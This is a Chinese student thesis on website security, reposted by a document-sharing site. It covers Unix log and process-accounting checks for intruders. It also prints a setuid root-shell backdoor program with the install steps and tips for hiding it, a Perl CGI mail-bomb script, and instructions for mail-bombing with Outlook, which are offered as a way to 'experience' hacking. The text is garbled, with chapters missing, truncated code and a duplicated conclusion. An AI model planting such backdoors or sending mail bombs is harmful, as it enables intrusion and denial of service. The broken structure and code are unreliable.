毕业论文安全与管理_安全管理专业毕业论文

毕业论文安全与管理由刀豆文库小编整理，希望给你工作、学习、生活带来方便，猜你可能喜欢“安全管理专业毕业论文”。

题 目：网站安全与管理

摘要

本文侧重在网站安全方面来谈，讨论了网站常用的保护方法，详细地分析比较了专用网站保护软件采用的各种技术实现和优缺点，并指出了其缺陷。安全虽不是使用某个工具或某些工具就可以解决的，但使用这些工具能帮助提高安全性，减少安全风险。只有更好的保障网站的安全，才能便于网站的管理。

关键词： 安全配置、防火墙、网站安全

目录

第一章

查出黑客所在首先，就要查出黑客所在才能更好的防御。查出黑客所在有两种方法：

1.用w指令查看系统信息

$w

9:01pm up 10:08, 1 user, load average: 0.08, 0.06, 0.05 User tty login@ idle JCPU PCPU what

notes console 10:54am 9days 28:04 23:29 /usr/dt/bin/dtscreen-mode blank

notes pts/2 10:54am 10:07 /sbin/sh notes pts/4 10:54am 10:06 /sbin/sh notes pts/5 10:56am 9:59 /sbin/sh

在w显示信息的最开头是发出w命令的时间、系统启动后的时间、及注册在系统的用户数。最后的三个数表示平均负载，即使用系统资源的程度，使用w命令给系统增加了0.08负载。其他两个数字分别表示在最后5分钟及十五分钟内系统的平均负载量。

注意：当有人在猜paword时，将会大大增加系统的平均负载。

2.进程记帐

Unix 系统可以通过设置选项来让核心在每个进程结束时产生一个记录。这些记录所产生的报告被称为进程记帐。它包括进程使用资源的信息，以及所执行的命令名。如果运行 的是调整用户id程序，则还包括用户名等。系统管理员可根据进程记帐的CPU时间让用户交纳上机费，也可用进程记帐来观察某一用户执行了哪些命令。进程记帐和审计是两码事，审计是监视对安全性敏感的事件。进程记帐并不记下所执行 命令的参数，所以无法知道某一命令修改了哪个文件，甚至也不知道此命令的执行是否成 功。但系统管理员仍然可以在进程记帐中找出某些线索。基于System V的系统和基于BSD的系统在进程记帐方面所采纳的方法不同，命令也不 一样。

2.1 System V记帐

在System V 中，进程记帐保存在/usr/adm/pactt文件中。root可运行/usr/lib/acct/startup 来启动进程记帐。记帐信息的日常处理可用runacct命令来做，它会压缩pacct文件。每月 的处理由shell程序monacct来完成。这两个程序都在/usr/lib/acct目录下。acctcom 命令可用来搜索pacct中的内容，并产生报告。例如：查找用户“tommy”在10:00 至11:30这段时间内所执行的全部命令。$acctcom-u tommy-s 10:00-e 11:30 START BEF: Sat Oct 10 11:30:00 1998 END AFTER: Sat Oct 10 10:00:00 1998 COMMAND START END REAL CPU MEAN

NAME USER TTYNAME TIME TIME(SECS)(SECS)SIZE(K)cat tommy pts/3 11:01:13 11:01:13 0.02 0.02 492.00 mail tommy pts/3 11:01:13 11:01:13 0.02 0.02 876.00 clear tommy pts/3 11:01:14 11:01:14 0.03 0.01 744.00 ls tommy pts/3 11:01:16 11:01:16 0.03 0.03 776.00 date tommy pts/3 11:01:23 11:01:23 0.01 0.01 664.00

acctcom命令用来告诉系统管理员某一用户干了些什么，而不是正在干什么，而且它指 列出了命令名，没有参数。所以，从中发现一些线索，如可找出使用大量cpu时间的进程(典型的是猜口令进程)。

可用shell程序runacct来产生几个报告。这些报告存放在/usr/adm/acct/sum目录下，其文件名格式为rprtMMDD。报告的第一部分包含“变更”信息，如进程记帐启动及关闭的 时间(关闭记帐可能是由于某人想隐藏某些活动),以及系统时间的改变。第二部分是每个 用户注册到系统的时间以及有关每个端口的报告，还包括了每个端口上“接通”和“断开” 的次数。“接通”表示一次成功的注册，“断开”表示退出系统或注册失败。

大量的“断开” 可能意味着有人在试验“注册名,口令”序列组试图侵入系统中。报告的最后一部分是有关用户最后一次注册的信息，这个最后注册报告是随着用户的 不断注册、退出而时刻更新的。报告中还包括用户名及最后的注册时间，越早退出系统 的帐号排在越前。这个报告对于发现那些死帐号非常有用，管理员可能会在这里发现一 些奇怪的事情如有人注册到系统管理的帐号中(如bin或sys)。

2.2 BSD系统的记帐

BSD系统的进程记帐用/usr/etc/accton程序启动。默认的记帐文件为/usr/adm/acct 只要启动了进程记帐，该文件会增长得很快。BSD有两条命令来处理记帐信息。第一条是 /usr/etc/ac,处理在usr/adm/wtmp文件中的注册信息，第二条是 /usr/etc/sa,产生已用 命令的小结报告，保存在/usr/adm/savacct文件中。

BSD系统中也有与acctcom类似的命令叫做lastcomm。lastcomm命令反向搜索/usr/adm/acct 文件，产生出与acctcom命令相似的结果。

BSD记帐系统也和System V一样，有类似的缺陷(从安全性角度讲),即不保留命令的参数。并且，BSD系统没有最后注册的报告。

现在针对前面的两点防卫措施，从攻的角度来看：

1.对与第一点中用w、who、last、ps等命令，hacker完全可以用程序将自己的记录隐藏 起来，使管理员用以上几个命令都查看不到。当然此时hacker已经把root的权限得到 手(如何得到，下章讨论)。

2.就算最笨的hacker,当他无法隐藏自己时，他也会把整个记录文件删除掉，免得管理员 查到用什么帐号从哪里登录进来，运行了些什么指令。但显而易见，虽然管理员此时(没安装第三方的审记软件时)不能知道谁人在哪里发起攻击，但也无疑地告诉管理员 “你的系统已经给攻破了”。

3.历史文件记录

ksh、csh、sh、bash、zsh都可保存历史文件。其文件如下: sh:.sh_history(sh 也即Bourne shell)csh:.history ksh:.sh_history bash:.bash_history zsh:.history

在运行sh和ksh的用户的相应.profile中，加入HISTORY=100，可指定.sh_history

文件保存该用户最近运行的100条记录。对于csh，则在.cshrc文件中加入, set history=100,则可。用户可以运行history指令来查看历史文件中的内容。对于Ksh、sh 也可运行 tail-f.sh_history 来查看，其顺序是从最近的运行的指令开始。而C shell 是在退出才能更新文件，所以不能用tail来观察Cshell执行了那些命令。这些历史文件比进程记帐更为有用，因为命令的参数也被保留下来，所以可通过执行 执行命令的上下文联系察觉到用户干了些什么。但话又说回来,其实这只起到一定作用而 已。BTW:.profile用于Bourne和Korn shell;.login和.cshrc用于C shell。

4.找出属主为root且带s位的程序:

以root身份执行以下的指令, 找出此类文件，看看是否有可疑的程序存在。

#find /-perm-4000-exec /bin/ls-lab {} “;”

其实在以前post的文章 1284 “系统安全技术的研究” 已有讨论过如何得到root shell 当hacker进入系统后,大部份是利用buffer overflow取得root shell 例如:solaris 中带s位的fdformat,ufsdump,ping等;AIX中xlock;SGI中的xlock;digital中的dop;等等，都给hacker找出其漏洞。当hacker利用这些big bugs取的root shell后，若其想以后还想入侵此系统的话，当然是留下root shell的程序，此时hakcer也不关心原来的bugs是否给fix掉，他/她 不再需要利用bug了，只须运行自己留下的root shell即给。以下给出得到root shell的简单程序:

#cat getrootshell.c void main(void){

setuid(0,0);

execl(“/bin/sh”, “sh”,0);}

编译后得到bin文件。此外，接着写入：#cc-o getrootshell getrootshell.c #chmod 4777 getrootshell #chown root:other getrootshell #ls-al getrootshell

-rwsrwxrwx 1 root other 5 Oct 12 06:14 getrootshell(注意全过程是在取的rootshell后，才可这样做)

这样hacker就在该系统中留下了后门，下次入来后就不需利用还没fix的 fdformat,xlock,dop等bug 的程序了，直接运行getrootshell程序，就可跳成root了。因此，管理员要查清此类型的文件。

现在从攻的角度来看上面两点防卫措施:

1..对于history文件，当hacker进入系统后可以改变shell类型，来使保存他后来所有指 令的history文件失效。因此，当hacker用crack到的帐号进入系统后，第一条所敲的指令 是改变shell类型的指令.example in digital unix下: c:>telnet XXX.XXX.XXX.XXX Digital UNIX(center)(ttyp5)login: tommy Paword:

Last login: Sun Oct 11 22:43:51 from HPVC.com

Digital UNIX V4.0A(Rev.464);Sat Feb 7 19:54:12 GMT+0800 1998

The installation software has succefully installed your system.There are logfiles that contain a record of your installation.These are:

/var/adm/smlogs/install.cdfgeneral log file

/var/adm/smlogs/install.FS.loglog for the setld(8)utility /var/adm/smlogs/fverify.log-verification log file center>chsh Old shell: /bin/sh New shell: ksh

其他系统不在此一一列举。

2.对于类似getrootshell的bin文件,hacker也不会真的那么愚蠢到起这个名字，且他们 会将此类型的程序藏在不易察觉的目录下，如果不是老练的管理员是不会发现的。(注:一般来说,hacker不会把getrootshell文件删除的，因为他也不能肯定下次进入系统时那些bugs还是否可以利用,使其变root)

第二章

网站的通用保护方法

针对黑客威胁，网络安全管理员采取各种手段增强服务器的安全，确保文档中的属性符号，不进行屏蔽会对论坛造成严重的后果，网络上不是有很多“小儿科”的聊天室踢人术吗？简单的方式是不允许小于号和大于号的出现，因为所有HTML语法必须包含在这两个字符间，如果程序检测到它们就返回一个错误提示，下面一行Perl代码快速地清除了这两个字符： $user_input=~s///g;当然，还有比较好的选择，就是将这两个字符转换成它们的HTML换码(特殊的代码),用于表示每个字符而不使用该字符本身。下面的代码通过全部用替换了大于符号，从而完成了转换过程: $user_input=~s//& gt;/g;

三、编写简单的邮件炸弹：

利用Perl程序可以非常快速的编写邮件炸弹程序，这种方法比起直接使用别人编写的邮件炸弹要好的多，至少能够真正“体会一下”什么才是黑客。这个炸弹的编译环境是具备一台有CGI权限的网络服务器，同时这台服务器上提供了sendmail命令（当然这一切可以在自己的系统上进行设置），并且还要初步了解有关perl语言的知识。

程序的原理非常简单，就是利用sendmail命令向目标重复发送相同内容的电子邮件，为了控制发送邮件的数量，我们声明一个计数器变量，同时将程序用while()函数做循环，下面是程序的源代码：

#!/bin/perl $file='/user/lib/sendmail';$target='someone@target.com';$count=0;while($count

print MAIL“哈哈，你被攻击啦” close(MAIL);sleep 3;$count++;}

程序就上面这些。Perl属于解释型语言，因而不需要进行编译，直接将源代码上传到服务器上，然后设置成为755或者775型，就可以通过浏览器调用而直接使用了。程序中的$file和$target变量分别定义了sendmail命令的路径和目标的地址，在使用此程序以前要根据个人需要进行修改，而$count变量是我们要发送的炸弹邮件数量，因为发送邮件工作是服务器完成的，因而速度非常快，这个数量可以设置的大一些，我们并不会感觉到程序的缓慢。

四、使用Outlook制作电子邮件炸弹：

相对上一种方法，这个方法更加直接，它不需要专用工具而只需要利用Outlook电子邮件客户端软件就可以轻松完成。首先介绍一下邮件炸弹的基本原理：电子邮件炸弹一般来说分成两种。一种是通过发送巨大的垃圾邮件使对方电子邮件服务器空间溢出，从而造成无法接受电子邮件；另一种方法是无休止的发送相同内容的但很小的邮件使对方接收不过来而放弃自己的电子邮箱。因此我们只要实现其中的一种即可称之为“邮件炸弹”。使用Outlook制作电子邮件炸弹就是利用了上面说的第二种方法，不断的向指定目标发送电子邮件，首先我们要做一些准备工作：申请一个免费的电子信箱，并把这个信箱账号设置到Outlook中，然后选择Outlook工具菜单的“工具”-〉“账号”，选择其中刚刚申请的那个电子邮件账号，然后点击窗口右面的“属性”按钮。在出现的属性窗口中继续点击窗口上面的“高级”标签，更改“发送”设置中的“邮件拆分大小”属性值，这个值尽量更改的小一些（推荐更改成16），确认退出。

这样以后只要使用这个经过设置的电子信箱发电子邮件，只要邮件的大小超过了规定的字节数，Outlook就会自动将电子邮件进行分割，例如一封1600KB的信件，将它拆分成16KB一封的电子邮件发送给对方，对方的信箱中就会出现100多封电子邮件，邮件炸弹的功能就实现了！

五、如何防止电子邮件炸弹：

电子邮件的防范可以从多个方面着手，例如未雨绸缪从开始就谨慎的使用电子信箱，或者也可以亡羊补牢尽快修复电子信箱。在网络上，大多数关于防范邮件炸弹的文章都说的是Linux等系统，而真正涉及初级用户的并不是很多，然是实际更多的人使用的还是Windows系统，即便pop3服务器是Linux系统，现在也没有更多的人通过传统的命令方式接收邮件了，这里将讲述一个与读者联系紧密的防止电子邮件炸弹的方法。

251、不公开信箱地址、准备多个信箱：

早作准备，不让黑客知道自己的电子信箱地址是最好的方法，这就需要使用者在网络上尽量少的公开自己的信箱地址，不要轻易将地址留给不认识的人或者留在电子论坛上。当然，如果可以，使用者可以多申请几个电子信箱，不同的信箱联络不同的人，专门预备出一个公开的电子信箱，一旦受到攻击也不会造成过多的损失。

2、使用软件快速清理炸弹邮件：

使用BombCleaner等炸弹清理软件，可以在不接受信件的时候察看邮件清单，从中选择垃圾信件进行远程删除，这样做可以节省大量下载信件的时间，同时也堵住了通过电子邮件传播的病毒。但是这种方法有它最明显的缺陷：一旦信箱已经被邮件塞满了，就来不及删除上面的信件、而且信发送过来的重要信件也无法接收了。

3、设置信箱过滤：

信箱过滤可以很好的解决上面软件解决不了的问题。过滤器可以设置在本地的电子邮件客户端程序上，也可以直接通过浏览器在pop3信箱的内部进行设置，前者和上面介绍的利用软件基本类似，也是在接收电子邮件的时候对邮件是否属于垃圾或炸弹进行判断，所以在信箱被塞满的时候也不见的起到什么效果。

但是，如果能够在pop3服务器上设置自己信箱的过滤，就可以从根本上避免被攻击的可能了。具体做法是这样的，通过浏览器登陆到pop3服务器上，然后进入自己的信箱，之后找到“邮件收发设置”，并且在其中的过滤器内填写有关发送垃圾邮件的邮件地址（多个地址可以用分号隔开），并且确认保存，这样就能够在服务器上过滤掉炸弹邮件、保障自己的电子信箱安全了。

4、设置接收邮件的大小：

如果黑客发送过来的不是成百上千封“小信件”，而是一封上百兆的炸弹怎么办呢？这种邮件不需要多少，一封过来就可以把电子信箱塞的满满的，所以用户在设置“过滤”的时候，还要注意“接收信件大小”选项，最好将这个数值控制在电子信箱的三分之一左右。例如使用者的电子信箱空间是三十兆，那么可以通过设置规定接收信件的大小不得超过十兆每一封，如果超过了这个数值，那么来信将被确认为邮件炸弹，而直接被系统舍弃，这样邮件炸弹便再无施展自己的空间了。

第五章

网站保护的缺陷

目前中国国内

80％的网站存在安全隐患，20％的网站有严重的安全问题。一位“黑客”甚至说如果他敲键的速度足够快的话，一天可以黑掉100个网站！这多少可以反映中国网络安全所存在的问题。

网络信息安全研究的人员认为这首先是没有安全意识。北京中联绿盟公司副总经理高永安说，一些网站认为他们的公司还小，不会成为黑客攻击的目标，即使被黑也不会有什么损失。广州京九公司总经理万涛认为，信息安全来自三个方面：技术、管理和学习，加强信息安全不能光做技术，还要重视内部管理和人员培养。而一些网络安全公司的不负责态度，也据估计不利于中国信息安全的提高。据分析，中国信息安全市场容量将达到1000亿元，目前从事信息安全服务的公司已超过一百家，但是市场却相当混乱。有些安全公司为了获得业务，甚至刻意地寻找甚至制造一些网络公司的系统漏洞，然后以此为筹码与网络公司谈判。一些媒体的片面报道，也可能产生不利的影响。据最近在广州进行的一次调查显示，4％的小学生希望成为黑客。媒体报道黑客事件时有两个倾向，一是玄化，将信息安全和黑客说得神乎其神；二是美化，将黑客塑造成英雄和偶像来崇拜。因此媒体必须加强引导，不要盲目地炒作黑客行为，更不能鼓吹黑客的破坏性。

可见，国内网站安全存在必然隐患的问题必须得以正视。尽管网站保护软件能进一步提高系统的安全，仍然存在一些缺陷。首先这些保护软件都是针对静态页面而设计，而现在动态页面占据的范围越来越大，尽管本地监测方式可以检测脚本文件，但对脚本文件使用的数据库却无能为力。

另外，有些攻击并不是针对页面文件进行的，前不久泛滥成灾的“Red Code”就是使用修改IIS服务的一个动态库来达到攻击页面的目的。另一个方面，网站保护软件本身会增加WWW服务器的负载，在WWW服务器负载本身已经很重的情况下，一定好仔细规划好使用方案

结束语

本文侧重在网站安全方面来谈，讨论了网站常用的保护方法，详细地分析比较了专用网站保护软件采用的各种技术实现和优缺点，并指出了其缺陷。安全虽不是使用某个工具或某些工具就可以解决的，但使用这些工具能帮助提高安全性，减少安全风险。只有更好 29 的保障网站的安全，才能便于网站的管理。

网络信息安全研究的人员认为这首先是没有安全意识。北京中联绿盟公司副总经理高永安说，一些网站认为他们的公司还小，不会成为黑客攻击的目标，即使被黑也不会有什么损失。广州京九公司总经理万涛认为，信息安全来自三个方面：技术、管理和学习，加强信息安全不能光做技术，还要重视内部管理和人员培养。而一些网络安全公司的不负责态度，也据估计不利于中国信息安全的提高。据分析，中国信息安全市场容量将达到1000亿元，目前从事信息安全服务的公司已超过一百家，但是市场却相当混乱。有些安全公司为了获得业务，甚至刻意地寻找甚至制造一些网络公司的系统漏洞，然后以此为筹码与网络公司谈判。一些媒体的片面报道，也可能产生不利的影响。据最近在广州进行的一次调查显示，4％的小学生希望成为黑客。媒体报道黑客事件时有两个倾向，一是玄化，将信息安全和黑客说得神乎其神；二是美化，将黑客塑造成英雄和偶像来崇拜。因此媒体必须加强引导，不要盲目地炒作黑客行为，更不能鼓吹黑客的破坏性。

参考文献

主要参考文献： „„„„„„